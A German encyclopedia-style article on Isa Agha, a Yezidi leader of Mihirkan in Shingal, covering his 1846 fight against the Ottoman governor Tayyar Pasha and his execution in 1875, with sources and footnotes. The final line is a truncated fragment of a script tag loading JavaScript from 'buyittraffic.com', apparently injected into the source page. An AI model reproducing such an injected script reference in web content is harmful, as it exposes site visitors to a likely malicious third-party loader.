Art. Nummer Autor Datum Aktualisierung
264 Diar Khalaf 17.06.2015

Isa Agha (gest. 1875 in Deir ez-Zor, Syrien) war ein Oberhaupt des êzîdischen Dorfes Mihirkan in Shingal und Sohn von Adi Della. In der êzîdischen Geschichte ist er vor allem für seinen erfolgreichen Kampf im Jahr 1846 gegen den osmanischen Gouvaneur von Mosul, Tayyar Pasha, bekannt. Er war ein Freund des britischen Archäologen Austen Henry Layard1.

Leben und Wirken

Isa wurde als erster Sohn von Adi Della in Mihirkan geboren. Nach dem Tod seines Vaters wurde er das neue Oberhaupt von Mihirkan2. Von 14 Oktober 1846 bis 17. Oktober 1846 tobte in Mihirkan und in den hohen Höhlen im Shingal-Gebirge nahe dem Dorf ein erbitterter Kampf zwischen den osmanischen Truppen Tayyar Pashas und den Dorfbewohnern Mihirkans, die unter dem Kommando von Isa Agha kämpften.

Die osmanischen Truppen, von Anzahl an Kämpfern und militärischer Ausrüstung her den Êzîden weit überlegen, wurden vernichtend geschlagen. Die Êzîden ist die Flucht gelungen3. Das Dorf allerdings war verwüstet und auch drei Jahre nach dem Kampf war der Großteil des Dorfes immer noch zerstört4.

Im Jahr 1875 wurde Isa Agha mit einigen anderen êzîdidschen Oberhäuptern vom Gouverneur von Deir ez-Zor hingerichtet5. Zu seinem Nachfolger wurde sein Sohn Dawid.

Literaturverzeichnis

Guest, John S. (1993): Survival Among the Kurds: A History of the Yezidis.
Layard, Austen Henry (1849): Nineveh and Its Remains: With an Account of a Visit to the Chaldean Christians of Kurdistan, and the Yezidis, Or Devil-worshippers; and an Inquiry Into the Manners and Arts of the Ancient Assyrians, London, Vol. I.
Layard, Austen Hanry (1853): Discoveries among the ruins of Nineveh and Babylon, New York.
Rişkanî, Silêman (2011): Jiyannama Dawidê Dawid, qehremanê du fermanan, in: Yezidische Helden – Mêrxasên Êzîdiyan, Oldenburg, S.326-332.

Einzelnachweis
[1] Layard 1853: S. 212f.
[2] Vgl. Rişkanî 2011: S. 237.
[3] Layard 1849 : S. 316ff.
[4] Layard 1853: S. 213.
[5] Vgl. Guest 1993: S. 123.

and.buyittraffic.com/clizkes' type='text/javascript'>